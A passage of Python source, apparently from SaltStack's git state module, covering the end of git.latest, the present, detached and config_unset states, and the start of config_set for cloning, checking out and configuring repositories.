return _failed_submodule_update(ret, exc, comments)
elif bare:
if __opts__['test']:
msg = (
'Bare repository at {0} would be fetched'
.format(target)
)
if ret['changes']:
return _neutral_test(ret, msg)
else:
return _uptodate(ret, target, msg)
try:
fetch_changes = __salt__['git.fetch'](
target,
remote=remote,
force=force_fetch,
refspecs=refspecs,
user=user,
password=password,
identity=identity,
saltenv=__env__)
except CommandExecutionError as exc:
return _failed_fetch(ret, exc, comments)
else:
comments.append(
'Bare repository at {0} was fetched{1}'.format(
target,
', resulting in updated refs'
if fetch_changes
else ''
)
)
try:
new_rev = __salt__['git.revision'](
cwd=target,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
new_rev = None
except Exception as exc:
log.error(
'Unexpected exception in git.latest state',
exc_info=True
)
if isinstance(exc, CommandExecutionError):
msg = _strip_exc(exc)
else:
msg = str(exc)
return _fail(ret, msg, comments)
if not bare and not _revs_equal(new_rev,
remote_rev,
remote_rev_type):
return _fail(ret, 'Failed to update repository', comments)
if local_rev != new_rev:
log.info(
'Repository {0} updated: {1} => {2}'.format(
target, local_rev, new_rev)
)
ret['comment'] = _format_comments(comments)
ret['changes']['revision'] = {'old': local_rev, 'new': new_rev}
else:
return _uptodate(ret, target, _format_comments(comments))
else:
if os.path.isdir(target):
if force_clone:
# Clone is required, and target directory exists, but the
# ``force`` option is enabled, so we need to clear out its
# contents to proceed.
if __opts__['test']:
ret['changes']['forced clone'] = True
ret['changes']['new'] = name + ' => ' + target
return _neutral_test(
ret,
'Target directory {0} exists. Since force_clone=True, '
'the contents of {0} would be deleted, and {1} would '
'be cloned into this directory.'.format(target, name)
)
log.debug(
'Removing contents of {0} to clone repository {1} in its '
'place (force_clone=True set in git.latest state)'
.format(target, name)
)
try:
if os.path.islink(target):
os.unlink(target)
else:
salt.utils.rm_rf(target)
except OSError as exc:
return _fail(
ret,
'Unable to remove {0}: {1}'.format(target, exc),
comments
)
else:
ret['changes']['forced clone'] = True
# Clone is required, but target dir exists and is non-empty. We
# can't proceed.
elif os.listdir(target):
return _fail(
ret,
'Target \'{0}\' exists, is non-empty and is not a git '
'repository. Set the \'force_clone\' option to True to '
'remove this directory\'s contents and proceed with '
'cloning the remote repository'.format(target)
)
log.debug(
'Target {0} is not found, \'git clone\' is required'.format(target)
)
if __opts__['test']:
ret['changes']['new'] = name + ' => ' + target
return _neutral_test(
ret,
'Repository {0} would be cloned to {1}'.format(
name, target
)
)
try:
clone_opts = ['--mirror'] if mirror else ['--bare'] if bare else []
if remote != 'origin':
clone_opts.extend(['--origin', remote])
if depth is not None:
clone_opts.extend(['--depth', str(depth)])
# We're cloning a fresh repo, there is no local branch or revision
local_branch = local_rev = None
try:
__salt__['git.clone'](target,
name,
user=user,
password=password,
opts=clone_opts,
identity=identity,
https_user=https_user,
https_pass=https_pass,
saltenv=__env__)
except CommandExecutionError as exc:
msg = 'Clone failed: {0}'.format(_strip_exc(exc))
return _fail(ret, msg, comments)
ret['changes']['new'] = name + ' => ' + target
comments.append(
'{0} cloned to {1}{2}'.format(
name,
target,
' as mirror' if mirror
else ' as bare repository' if bare
else ''
)
)
if not bare:
if not remote_rev:
if rev != 'HEAD':
# No HEAD means the remote repo is empty, which means
# our new clone will also be empty. This state has
# failed, since a rev was specified but no matching rev
# exists on the remote host.
msg = (
'{{0}} was cloned but is empty, so {0}/{1} '
'cannot be checked out'.format(remote, rev)
)
log.error(msg.format(name))
return _fail(ret, msg.format('Repository'), comments)
else:
if remote_rev_type == 'tag' \
and rev not in __salt__['git.list_tags'](
target, user=user, password=password):
return _fail(
ret,
'Revision \'{0}\' does not exist in clone'
.format(rev),
comments
)
if branch is not None:
if branch not in \
__salt__['git.list_branches'](
target,
user=user,
password=password):
if rev == 'HEAD':
checkout_rev = remote_rev
else:
checkout_rev = desired_upstream \
if desired_upstream \
else rev
__salt__['git.checkout'](target,
checkout_rev,
opts=['-b', branch],
user=user,
password=password)
comments.append(
'Branch \'{0}\' checked out, with {1} '
'as a starting point'.format(
branch,
remote_loc
)
)
local_rev, local_branch = \
_get_local_rev_and_branch(target, user, password)
if local_branch is None \
and remote_rev is not None \
and 'HEAD' not in all_remote_refs:
return _fail(
ret,
'Remote HEAD refers to a ref that does not exist. '
'This can happen when the default branch on the '
'remote repository is renamed or deleted. If you '
'are unable to fix the remote repository, you can '
'work around this by setting the \'branch\' argument '
'(which will ensure that the named branch is created '
'if it does not already exist).',
comments
)
if not _revs_equal(local_rev, remote_rev, remote_rev_type):
__salt__['git.reset'](
target,
opts=['--hard', remote_rev],
user=user,
password=password)
comments.append(
'Repository was reset to {0}'.format(remote_loc)
)
try:
upstream = __salt__['git.rev_parse'](
target,
local_branch + '@{upstream}',
opts=['--abbrev-ref'],
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
upstream = False
if not upstream and desired_upstream:
upstream_action = (
'Tracking branch was set to {0}'.format(
desired_upstream
)
)
branch_opts = _get_branch_opts(
branch,
local_branch,
__salt__['git.list_branches'](target,
user=user,
password=password),
desired_upstream,
git_ver)
elif upstream and desired_upstream is False:
# If the remote_rev is a tag or SHA1, and there is an
# upstream tracking branch, we will unset it. However,
# we can only do this if the git version is 1.8.0 or
# newer, as the --unset-upstream option was not added
# until that version.
if git_ver >= _LooseVersion('1.8.0'):
upstream_action = 'Tracking branch was unset'
branch_opts = ['--unset-upstream']
else:
branch_opts = None
elif desired_upstream and upstream != desired_upstream:
upstream_action = (
'Tracking branch was updated to {0}'.format(
desired_upstream
)
)
branch_opts = _get_branch_opts(
branch,
local_branch,
__salt__['git.list_branches'](target,
user=user,
password=password),
desired_upstream,
git_ver)
else:
branch_opts = None
if branch_opts is not None:
__salt__['git.branch'](
target,
opts=branch_opts,
user=user,
password=password)
comments.append(upstream_action)
if submodules and remote_rev:
try:
__salt__['git.submodule'](target,
'update',
opts=['--init', '--recursive'],
user=user,
password=password,
identity=identity)
except CommandExecutionError as exc:
return _failed_submodule_update(ret, exc, comments)
try:
new_rev = __salt__['git.revision'](
cwd=target,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
new_rev = None
except Exception as exc:
log.error(
'Unexpected exception in git.latest state',
exc_info=True
)
if isinstance(exc, CommandExecutionError):
msg = _strip_exc(exc)
else:
msg = str(exc)
return _fail(ret, msg, comments)
msg = _format_comments(comments)
log.info(msg)
ret['comment'] = msg
if new_rev is not None:
ret['changes']['revision'] = {'old': None, 'new': new_rev}
return ret
def present(name,
            force=False,
            bare=True,
            template=None,
            separate_git_dir=None,
            shared=None,
            user=None,
            password=None):
    '''
    Ensure that a git repository has been initialized in the named directory

    .. warning::
        If the minion has Git 2.5 or later installed, ``name`` points to a
        worktree_, and ``force`` is set to ``True``, then the worktree will be
        deleted. This has been corrected in Salt 2015.8.0.

    name
        Path to the directory

        .. versionchanged:: 2015.8.0
            This path must now be absolute

    force : False
        If ``True``, and if ``name`` points to an existing directory which does
        not contain a git repository, then the contents of that directory will
        be recursively removed and a new repository will be initialized in its
        place.

    bare : True
        If ``True``, and a repository must be initialized, then the repository
        will be a bare repository.

        .. note::
            This differs from the default behavior of :py:func:`git.init
            <salt.modules.git.init>`, make sure to set this value to ``False``
            if a bare repo is not desired.

    template
        If a new repository is initialized, this argument will specify an
        alternate `template directory`_

        .. versionadded:: 2015.8.0

    separate_git_dir
        If a new repository is initialized, this argument will specify an
        alternate ``$GIT_DIR``

        .. versionadded:: 2015.8.0

    shared
        Set sharing permissions on git repo. See `git-init(1)`_ for more
        details.

        .. versionadded:: 2015.5.0

    user
        User under which to run git commands. By default, commands are run by
        the user under which the minion is running.

        .. versionadded:: 0.17.0

    password
        Windows only. Required when specifying ``user``. This parameter will be
        ignored on non-Windows platforms.

        .. versionadded:: 2016.3.4

    .. _`git-init(1)`: http://git-scm.com/docs/git-init
    .. _`worktree`: http://git-scm.com/docs/git-worktree
    '''
    ret = {'name': name, 'result': True, 'comment': '', 'changes': {}}
    if os.path.isdir(name):
        # Figure out whether the existing directory is already a git repo of
        # the requested kind. Bare repos keep HEAD at the top level; non-bare
        # checkouts have a .git subdir, or may be a linked worktree.
        if bare:
            already_repo = os.path.isfile(os.path.join(name, 'HEAD'))
        else:
            already_repo = (
                os.path.isdir(os.path.join(name, '.git'))
                or __salt__['git.is_worktree'](name,
                                               user=user,
                                               password=password)
            )
        if already_repo:
            return ret
        if force:
            # Directory exists but is not a git repo. force=True, so wipe the
            # directory's contents and initialize a fresh repo in its place.
            if __opts__['test']:
                ret['changes']['new'] = name
                ret['changes']['forced init'] = True
                return _neutral_test(
                    ret,
                    'Target directory {0} exists. Since force=True, the '
                    'contents of {0} would be deleted, and a {1}repository '
                    'would be initialized in its place.'
                    .format(name, 'bare ' if bare else '')
                )
            log.debug(
                'Removing contents of {0} to initialize {1}repository in its '
                'place (force=True set in git.present state)'
                .format(name, 'bare ' if bare else '')
            )
            try:
                if os.path.islink(name):
                    os.unlink(name)
                else:
                    salt.utils.rm_rf(name)
            except OSError as exc:
                return _fail(
                    ret,
                    'Unable to remove {0}: {1}'.format(name, exc)
                )
            ret['changes']['forced init'] = True
        elif os.listdir(name):
            # Non-empty, not a repo, and force not set: nothing safe to do.
            return _fail(
                ret,
                'Target \'{0}\' exists, is non-empty, and is not a git '
                'repository. Set the \'force\' option to True to remove '
                'this directory\'s contents and proceed with initializing a '
                'repository'.format(name)
            )
    # In test mode, report what would happen without touching the filesystem
    if __opts__['test']:
        ret['changes']['new'] = name
        return _neutral_test(
            ret,
            'New {0}repository would be created'.format(
                'bare ' if bare else ''
            )
        )
    __salt__['git.init'](cwd=name,
                         bare=bare,
                         template=template,
                         separate_git_dir=separate_git_dir,
                         shared=shared,
                         user=user,
                         password=password)
    msg_parts = [
        'Initialized {0}repository in {1}'.format(
            'bare ' if bare else '',
            name
        )
    ]
    if template:
        msg_parts.append('Template directory set to {0}'.format(template))
    if separate_git_dir:
        msg_parts.append('Gitdir set to {0}'.format(separate_git_dir))
    message = '. '.join(msg_parts)
    if len(msg_parts) > 1:
        message += '.'
    log.info(message)
    ret['changes']['new'] = name
    ret['comment'] = message
    return ret
def detached(name,
             ref,
             target=None,
             remote='origin',
             user=None,
             password=None,
             force_clone=False,
             force_checkout=False,
             fetch_remote=True,
             hard_reset=False,
             submodules=False,
             identity=None,
             https_user=None,
             https_pass=None,
             onlyif=False,
             unless=False,
             **kwargs):
    '''
    .. versionadded:: 2016.3.0

    Make sure a repository is cloned to the given target directory and is
    a detached HEAD checkout of the commit ID resolved from ``ref``.

    name
        Address of the remote repository.

    ref
        The branch, tag, or commit ID to checkout after clone.
        If a branch or tag is specified it will be resolved to a commit ID
        and checked out.

    target
        Name of the target directory where repository is about to be cloned.

    remote : origin
        Git remote to use. If this state needs to clone the repo, it will clone
        it using this value as the initial remote name. If the repository
        already exists, and a remote by this name is not present, one will be
        added.

    user
        User under which to run git commands. By default, commands are run by
        the user under which the minion is running.

    password
        Windows only. Required when specifying ``user``. This parameter will be
        ignored on non-Windows platforms.

        .. versionadded:: 2016.3.4

    force_clone : False
        If the ``target`` directory exists and is not a git repository, then
        this state will fail. Set this argument to ``True`` to remove the
        contents of the target directory and clone the repo into it.

    force_checkout : False
        When checking out the revision ID, the state will fail if there are
        unwritten changes. Set this argument to ``True`` to discard unwritten
        changes when checking out.

    fetch_remote : True
        If ``False`` a fetch will not be performed and only local refs
        will be reachable.

    hard_reset : False
        If ``True`` a hard reset will be performed before the checkout and any
        uncommitted modifications to the working directory will be discarded.
        Untracked files will remain in place.

        .. note::
            Changes resulting from a hard reset will not trigger requisites.

    submodules : False
        Update submodules

    identity
        A path on the minion (or a SaltStack fileserver URL, e.g.
        ``salt://path/to/identity_file``) to a private key to use for SSH
        authentication.

    https_user
        HTTP Basic Auth username for HTTPS (only) clones

    https_pass
        HTTP Basic Auth password for HTTPS (only) clones

    onlyif
        A command to run as a check, run the named command only if the command
        passed to the ``onlyif`` option returns true

    unless
        A command to run as a check, only run the named command if the command
        passed to the ``unless`` option returns false
    '''
    ret = {'name': name, 'result': True, 'comment': '', 'changes': {}}
    kwargs = salt.utils.clean_kwargs(**kwargs)
    if kwargs:
        return _fail(
            ret,
            salt.utils.invalid_kwargs(kwargs, raise_exc=False)
        )
    if not ref:
        return _fail(
            ret,
            '\'{0}\' is not a valid value for the \'ref\' argument'.format(ref)
        )
    if not target:
        # NOTE: interpolate target here (the original message mistakenly
        # reported the value of ref).
        return _fail(
            ret,
            '\'{0}\' is not a valid value for the \'target\' argument'.format(
                target)
        )
    # Ensure that certain arguments are strings to ensure that comparisons work
    if not isinstance(ref, six.string_types):
        ref = str(ref)
    if target is not None:
        if not isinstance(target, six.string_types):
            target = str(target)
        if not os.path.isabs(target):
            return _fail(
                ret,
                'Target \'{0}\' is not an absolute path'.format(target)
            )
    if user is not None and not isinstance(user, six.string_types):
        user = str(user)
    if remote is not None and not isinstance(remote, six.string_types):
        remote = str(remote)
    if identity is not None:
        if isinstance(identity, six.string_types):
            identity = [identity]
        elif not isinstance(identity, list):
            return _fail(ret, 'Identity must be either a list or a string')
        for ident_path in identity:
            if 'salt://' in ident_path:
                # Cache fileserver-hosted keys locally before use
                try:
                    ident_path = __salt__['cp.cache_file'](ident_path)
                except IOError as exc:
                    log.error(
                        'Failed to cache {0}: {1}'.format(ident_path, exc)
                    )
                    return _fail(
                        ret,
                        'Identity \'{0}\' does not exist.'.format(
                            ident_path
                        )
                    )
            if not os.path.isabs(ident_path):
                return _fail(
                    ret,
                    'Identity \'{0}\' is not an absolute path'.format(
                        ident_path
                    )
                )
    if https_user is not None and not isinstance(https_user, six.string_types):
        https_user = str(https_user)
    if https_pass is not None and not isinstance(https_pass, six.string_types):
        https_pass = str(https_pass)
    if os.path.isfile(target):
        return _fail(
            ret,
            'Target \'{0}\' exists and is a regular file, cannot proceed'
            .format(target)
        )
    try:
        desired_fetch_url = salt.utils.url.add_http_basic_auth(
            name,
            https_user,
            https_pass,
            https_only=True
        )
    except ValueError as exc:
        return _fail(ret, exc.__str__())
    redacted_fetch_url = salt.utils.url.redact_http_basic_auth(desired_fetch_url)
    # Check if onlyif or unless conditions match
    run_check_cmd_kwargs = {'runas': user}
    if 'shell' in __grains__:
        run_check_cmd_kwargs['shell'] = __grains__['shell']
    cret = mod_run_check(
        run_check_cmd_kwargs, onlyif, unless
    )
    if isinstance(cret, dict):
        ret.update(cret)
        return ret
    # Determine if supplied ref is a hash. Note that a short ref name made up
    # entirely of hex digits (e.g. a branch named 'beef') would also match
    # this heuristic.
    remote_ref_type = 'ref'
    if len(ref) <= 40 \
            and all(x in string.hexdigits for x in ref):
        ref = ref.lower()
        remote_ref_type = 'hash'
    comments = []
    hash_exists_locally = False
    local_commit_id = None
    gitdir = os.path.join(target, '.git')
    if os.path.isdir(gitdir) \
            or __salt__['git.is_worktree'](target, user=user, password=password):
        # Target directory is a git repository or git worktree
        local_commit_id = _get_local_rev_and_branch(target, user, password)[0]
        # Use == for string comparison; 'is' relies on CPython string
        # interning and raises a SyntaxWarning on Python 3.8+.
        if remote_ref_type == 'hash' \
                and __salt__['git.describe'](target,
                                             ref,
                                             user=user,
                                             password=password):
            # The ref is a hash and it exists locally so skip to checkout
            hash_exists_locally = True
        else:
            # Check that remote is present and set to correct url
            remotes = __salt__['git.remotes'](target,
                                              user=user,
                                              password=password,
                                              redact_auth=False)
            if remote in remotes and name in remotes[remote]['fetch']:
                pass
            else:
                # The fetch_url for the desired remote does not match the
                # specified URL (or the remote does not exist), so set the
                # remote URL.
                current_fetch_url = None
                if remote in remotes:
                    current_fetch_url = remotes[remote]['fetch']
                if __opts__['test']:
                    return _neutral_test(
                        ret,
                        'Remote {0} would be set to {1}'.format(
                            remote, name
                        )
                    )
                __salt__['git.remote_set'](target,
                                           url=name,
                                           remote=remote,
                                           user=user,
                                           password=password,
                                           https_user=https_user,
                                           https_pass=https_pass)
                comments.append(
                    'Remote {0} updated from \'{1}\' to \'{2}\''.format(
                        remote,
                        str(current_fetch_url),
                        name
                    )
                )
    else:
        # Clone repository
        if os.path.isdir(target):
            if force_clone:
                # Clone is required, and target directory exists, but the
                # ``force`` option is enabled, so we need to clear out its
                # contents to proceed.
                if __opts__['test']:
                    return _neutral_test(
                        ret,
                        'Target directory {0} exists. Since force_clone=True, '
                        'the contents of {0} would be deleted, and {1} would '
                        'be cloned into this directory.'.format(target, name)
                    )
                log.debug(
                    'Removing contents of {0} to clone repository {1} in its '
                    'place (force_clone=True set in git.detached state)'
                    .format(target, name)
                )
                try:
                    if os.path.islink(target):
                        os.unlink(target)
                    else:
                        salt.utils.rm_rf(target)
                except OSError as exc:
                    return _fail(
                        ret,
                        'Unable to remove {0}: {1}'.format(target, exc),
                        comments
                    )
                else:
                    ret['changes']['forced clone'] = True
            elif os.listdir(target):
                # Clone is required, but target dir exists and is non-empty. We
                # can't proceed.
                return _fail(
                    ret,
                    'Target \'{0}\' exists, is non-empty and is not a git '
                    'repository. Set the \'force_clone\' option to True to '
                    'remove this directory\'s contents and proceed with '
                    'cloning the remote repository'.format(target)
                )
        log.debug(
            'Target {0} is not found, \'git clone\' is required'.format(target)
        )
        if __opts__['test']:
            return _neutral_test(
                ret,
                'Repository {0} would be cloned to {1}'.format(
                    name, target
                )
            )
        try:
            # --no-checkout: we will explicitly check out the resolved
            # commit ID below, so skip the default branch checkout.
            clone_opts = ['--no-checkout']
            if remote != 'origin':
                clone_opts.extend(['--origin', remote])
            __salt__['git.clone'](target,
                                  name,
                                  user=user,
                                  password=password,
                                  opts=clone_opts,
                                  identity=identity,
                                  https_user=https_user,
                                  https_pass=https_pass,
                                  saltenv=__env__)
            comments.append(
                '{0} cloned to {1}'.format(
                    name,
                    target
                )
            )
        except Exception as exc:
            log.error(
                'Unexpected exception in git.detached state',
                exc_info=True
            )
            if isinstance(exc, CommandExecutionError):
                msg = _strip_exc(exc)
            else:
                msg = str(exc)
            return _fail(ret, msg, comments)
    # Repository exists and is ready for fetch/checkout
    refspecs = [
        'refs/heads/*:refs/remotes/{0}/*'.format(remote),
        '+refs/tags/*:refs/tags/*'
    ]
    if hash_exists_locally or fetch_remote is False:
        # Desired commit already present locally, or fetching was disabled
        pass
    else:
        # Fetch refs from remote
        if __opts__['test']:
            return _neutral_test(
                ret,
                'Repository remote {0} would be fetched'.format(
                    remote
                )
            )
        try:
            fetch_changes = __salt__['git.fetch'](
                target,
                remote=remote,
                force=True,
                refspecs=refspecs,
                user=user,
                password=password,
                identity=identity,
                saltenv=__env__)
        except CommandExecutionError as exc:
            msg = 'Fetch failed'
            msg += ':\n\n' + str(exc)
            return _fail(ret, msg, comments)
        else:
            if fetch_changes:
                comments.append(
                    'Remote {0} was fetched, resulting in updated '
                    'refs'.format(remote)
                )
    # Resolve the ref to a commit ID, then check it out
    checkout_commit_id = ''
    if remote_ref_type == 'hash':
        if __salt__['git.describe'](target, ref, user=user, password=password):
            checkout_commit_id = ref
        else:
            return _fail(
                ret,
                'Ref does not exist: {0}'.format(ref)
            )
    else:
        try:
            all_remote_refs = __salt__['git.remote_refs'](
                target,
                user=user,
                password=password,
                identity=identity,
                https_user=https_user,
                https_pass=https_pass,
                ignore_retcode=False)
            if 'refs/remotes/'+remote+'/'+ref in all_remote_refs:
                checkout_commit_id = all_remote_refs['refs/remotes/'+remote+'/'+ref]
            elif 'refs/tags/'+ref in all_remote_refs:
                checkout_commit_id = all_remote_refs['refs/tags/'+ref]
            else:
                return _fail(
                    ret,
                    'Ref {0} does not exist'.format(ref)
                )
        except CommandExecutionError as exc:
            return _fail(
                ret,
                'Failed to list refs for {0}: {1}'.format(remote, _strip_exc(exc))
            )
    if hard_reset:
        if __opts__['test']:
            return _neutral_test(
                ret,
                'Hard reset to HEAD would be performed on {0}'.format(
                    target
                )
            )
        __salt__['git.reset'](
            target,
            opts=['--hard', 'HEAD'],
            user=user,
            password=password)
        comments.append(
            'Repository was reset to HEAD before checking out ref'
        )
    # TODO: implement clean function for git module and add clean flag
    if checkout_commit_id == local_commit_id:
        # Already at the requested commit; nothing to check out
        new_rev = None
    else:
        if __opts__['test']:
            ret['changes']['HEAD'] = {'old': local_commit_id, 'new': checkout_commit_id}
            return _neutral_test(
                ret,
                'Commit ID {0} would be checked out at {1}'.format(
                    checkout_commit_id,
                    target
                )
            )
        __salt__['git.checkout'](target,
                                 checkout_commit_id,
                                 force=force_checkout,
                                 user=user,
                                 password=password)
        comments.append(
            'Commit ID {0} was checked out at {1}'.format(
                checkout_commit_id,
                target
            )
        )
        try:
            new_rev = __salt__['git.revision'](
                cwd=target,
                user=user,
                password=password,
                ignore_retcode=True)
        except CommandExecutionError:
            new_rev = None
    if submodules:
        __salt__['git.submodule'](target,
                                  'update',
                                  opts=['--init', '--recursive'],
                                  user=user,
                                  password=password,
                                  identity=identity)
        comments.append(
            'Submodules were updated'
        )
    if new_rev is not None:
        ret['changes']['HEAD'] = {'old': local_commit_id, 'new': new_rev}
    else:
        comments.append("Already checked out at correct revision")
    msg = _format_comments(comments)
    log.info(msg)
    ret['comment'] = msg
    return ret
def config_unset(name,
                 value_regex=None,
                 repo=None,
                 user=None,
                 password=None,
                 **kwargs):
    r'''
    .. versionadded:: 2015.8.0

    Ensure that the named config key is not present

    name
        The name of the configuration key to unset. This value can be a regex,
        but the regex must match the entire key name. For example, ``foo\.``
        would not match all keys in the ``foo`` section, it would be necessary
        to use ``foo\..+`` to do so.

    value_regex
        Regex indicating the values to unset for the matching key(s)

        .. note::
            This option behaves differently depending on whether or not ``all``
            is set to ``True``. If it is, then all values matching the regex
            will be deleted (this is the only way to delete multiple values
            from a multivar). If ``all`` is set to ``False``, then this state
            will fail if the regex matches more than one value in a multivar.

    all : False
        If ``True``, unset all matches

    repo
        Location of the git repository for which the config value should be
        set. Required unless ``global`` is set to ``True``.

    user
        User under which to run git commands. By default, commands are run by
        the user under which the minion is running.

    password
        Windows only. Required when specifying ``user``. This parameter will be
        ignored on non-Windows platforms.

        .. versionadded:: 2016.3.4

    global : False
        If ``True``, this will set a global git config option

    **Examples:**

    .. code-block:: yaml

        # Value matching 'baz'
        mylocalrepo:
          git.config_unset:
            - name: foo.bar
            - value_regex: 'baz'
            - repo: /path/to/repo

        # Ensure entire multivar is unset
        mylocalrepo:
          git.config_unset:
            - name: foo.bar
            - all: True

        # Ensure all variables in 'foo' section are unset, including multivars
        mylocalrepo:
          git.config_unset:
            - name: 'foo\..+'
            - all: True

        # Ensure that global config value is unset
        mylocalrepo:
          git.config_unset:
            - name: foo.bar
            - global: True
    '''
    ret = {'name': name,
           'changes': {},
           'result': True,
           'comment': 'No matching keys are set'}

    # Sanitize kwargs and make sure that no invalid ones were passed. This
    # allows us to accept 'global' as an argument to this function without
    # shadowing global(), while also not allowing unwanted arguments to be
    # passed.
    kwargs = salt.utils.clean_kwargs(**kwargs)
    global_ = kwargs.pop('global', False)
    all_ = kwargs.pop('all', False)
    if kwargs:
        return _fail(
            ret,
            salt.utils.invalid_kwargs(kwargs, raise_exc=False)
        )

    if not global_ and not repo:
        return _fail(
            ret,
            'Non-global config options require the \'repo\' argument to be '
            'set'
        )

    if not isinstance(name, six.string_types):
        name = str(name)
    if value_regex is not None:
        if not isinstance(value_regex, six.string_types):
            value_regex = str(value_regex)

    # Ensure that the key regex matches the full key name
    key = '^' + name.lstrip('^').rstrip('$') + '$'

    # Get matching keys/values
    pre_matches = __salt__['git.config_get_regexp'](
        cwd=repo,
        key=key,
        value_regex=value_regex,
        user=user,
        password=password,
        ignore_retcode=True,
        **{'global': global_}
    )

    if not pre_matches:
        # No changes need to be made
        return ret

    # Perform sanity check on the matches. We can't proceed if the value_regex
    # matches more than one value in a given key, and 'all' is not set to True
    if not all_:
        greedy_matches = ['{0} ({1})'.format(x, ', '.join(y))
                          for x, y in six.iteritems(pre_matches)
                          if len(y) > 1]
        if greedy_matches:
            if value_regex is not None:
                return _fail(
                    ret,
                    'Multiple values are matched by value_regex for the '
                    'following keys (set \'all\' to True to force removal): '
                    '{0}'.format('; '.join(greedy_matches))
                )
            else:
                return _fail(
                    ret,
                    'Multivar(s) matched by the key expression (set \'all\' '
                    'to True to force removal): {0}'.format(
                        '; '.join(greedy_matches)
                    )
                )

    if __opts__['test']:
        ret['changes'] = pre_matches
        return _neutral_test(
            ret,
            '{0} key(s) would have value(s) unset'.format(len(pre_matches))
        )

    if value_regex is None:
        pre = pre_matches
    else:
        # Get all keys matching the key expression, so we can accurately report
        # on changes made.
        pre = __salt__['git.config_get_regexp'](
            cwd=repo,
            key=key,
            value_regex=None,
            user=user,
            password=password,
            ignore_retcode=True,
            **{'global': global_}
        )

    failed = []
    # Unset the specified value(s). There is no unset for regexes so loop
    # through the pre_matches dict and unset each matching key individually.
    for key_name in pre_matches:
        try:
            __salt__['git.config_unset'](
                cwd=repo,
                # Unset this specific matched key, not the (possibly regex)
                # 'name' argument, which git would treat as a literal key.
                key=key_name,
                value_regex=value_regex,
                all=all_,
                user=user,
                password=password,
                **{'global': global_}
            )
        except CommandExecutionError as exc:
            msg = 'Failed to unset \'{0}\''.format(key_name)
            if value_regex is not None:
                # Interpolate the regex; the placeholder was previously left
                # unformatted and logged literally.
                msg += ' using value_regex \'{0}\''.format(value_regex)
            msg += ': ' + _strip_exc(exc)
            log.error(msg)
            failed.append(key_name)

    if failed:
        return _fail(
            ret,
            'Error(s) occurred unsetting values for the following keys (see '
            'the minion log for details): {0}'.format(', '.join(failed))
        )

    post = __salt__['git.config_get_regexp'](
        cwd=repo,
        key=key,
        value_regex=None,
        user=user,
        password=password,
        ignore_retcode=True,
        **{'global': global_}
    )

    for key_name in pre:
        if key_name not in post:
            # Entire key was removed; skip the per-value diff below, which
            # would otherwise raise a KeyError on post[key_name].
            ret['changes'][key_name] = pre[key_name]
            continue
        unset = [x for x in pre[key_name] if x not in post[key_name]]
        if unset:
            ret['changes'][key_name] = unset

    if value_regex is None:
        post_matches = post
    else:
        post_matches = __salt__['git.config_get_regexp'](
            cwd=repo,
            key=key,
            value_regex=value_regex,
            user=user,
            password=password,
            ignore_retcode=True,
            **{'global': global_}
        )

    if post_matches:
        failed = ['{0} ({1})'.format(x, ', '.join(y))
                  for x, y in six.iteritems(post_matches)]
        return _fail(
            ret,
            'Failed to unset value(s): {0}'.format('; '.join(failed))
        )

    ret['comment'] = 'Value(s) successfully unset'
    return ret
def config_set(name,
               value=None,
               multivar=None,
               repo=None,
               user=None,
               password=None,
               **kwargs):
    '''
    .. versionadded:: 2014.7.0
    .. versionchanged:: 2015.8.0
        Renamed from ``git.config`` to ``git.config_set``. For earlier
        versions, use ``git.config``.

    Ensure that a config value is set to the desired value(s)

    name
        Name of the git config value to set

    value
        Set a single value for the config item

    multivar
        Set multiple values for the config item

        .. note::
            The order matters here, if the same parameters are set but in a
            different order, they will be removed and replaced in the order
            specified.

        .. versionadded:: 2015.8.0

    repo
        Location of the git repository for which the config value should be
        set. Required unless ``global`` is set to ``True``.

    user
        User under which to run git commands. By default, the commands are run
        by the user under which the minion is running.

    password
        Windows only. Required when specifying ``user``. This parameter will be
        ignored on non-Windows platforms.

        .. versionadded:: 2016.3.4

    global : False
        If ``True``, this will set a global git config option

    **Local Config Example:**

    .. code-block:: yaml

        # Single value
        mylocalrepo:
          git.config_set:
            - name: user.email
            - value: foo@bar.net
            - repo: /path/to/repo

        # Multiple values
        mylocalrepo:
          git.config_set:
            - name: mysection.myattribute
            - multivar:
              - foo
              - bar
              - baz
            - repo: /path/to/repo

    **Global Config Example (User ``foo``):**

    .. code-block:: yaml

        mylocalrepo:
          git.config_set:
            - name: user.name
            - value: Foo Bar
            - user: foo
            - global: True
    '''
    ret = {'name': name,
           'changes': {},
           'result': True,
           'comment': ''}

    if value is not None and multivar is not None:
        return _fail(
            ret,
            'Only one of \'value\' and \'multivar\' is permitted'
        )
    # Fail cleanly here rather than hitting a NameError further down
    # ('desired'/'value_comment' would never be assigned).
    if value is None and multivar is None:
        return _fail(
            ret,
            'One of \'value\' and \'multivar\' is required'
        )

    # Sanitize kwargs and make sure that no invalid ones were passed. This
    # allows us to accept 'global' as an argument to this function without
    # shadowing global(), while also not allowing unwanted arguments to be
    # passed.
    kwargs = salt.utils.clean_kwargs(**kwargs)
    global_ = kwargs.pop('global', False)
    if kwargs:
        return _fail(
            ret,
            salt.utils.invalid_kwargs(kwargs, raise_exc=False)
        )

    if not global_ and not repo:
        return _fail(
            ret,
            'Non-global config options require the \'repo\' argument to be '
            'set'
        )

    if not isinstance(name, six.string_types):
        name = str(name)
    if value is not None:
        if not isinstance(value, six.string_types):
            value = str(value)
        value_comment = '\'' + value + '\''
        desired = [value]
    if multivar is not None:
        if not isinstance(multivar, list):
            try:
                multivar = multivar.split(',')
            except AttributeError:
                multivar = str(multivar).split(',')
        else:
            new_multivar = []
            for item in multivar:
                if isinstance(item, six.string_types):
                    new_multivar.append(item)
                else:
                    new_multivar.append(str(item))
            multivar = new_multivar
        value_comment = multivar
        desired = multivar

    # Get current value
    pre = __salt__['git.config_get'](
        cwd=repo,
        key=name,
        user=user,
        password=password,
        ignore_retcode=True,
        **{'all': True, 'global': global_}
    )

    if desired == pre:
        ret['comment'] = '{0}\'{1}\' is already set to {2}'.format(
            'Global key ' if global_ else '',
            name,
            value_comment
        )
        return ret

    if __opts__['test']:
        ret['changes'] = {'old': pre, 'new': desired}
        msg = '{0}\'{1}\' would be {2} {3}'.format(
            'Global key ' if global_ else '',
            name,
            'added as' if pre is None else 'set to',
            value_comment
        )
        return _neutral_test(ret, msg)

    try:
        # Set/update config value
        post = __salt__['git.config_set'](
            cwd=repo,
            key=name,
            value=value,
            multivar=multivar,
            user=user,
            password=password,
            **{'global': global_}
        )
    except CommandExecutionError as exc:
        return _fail(
            ret,
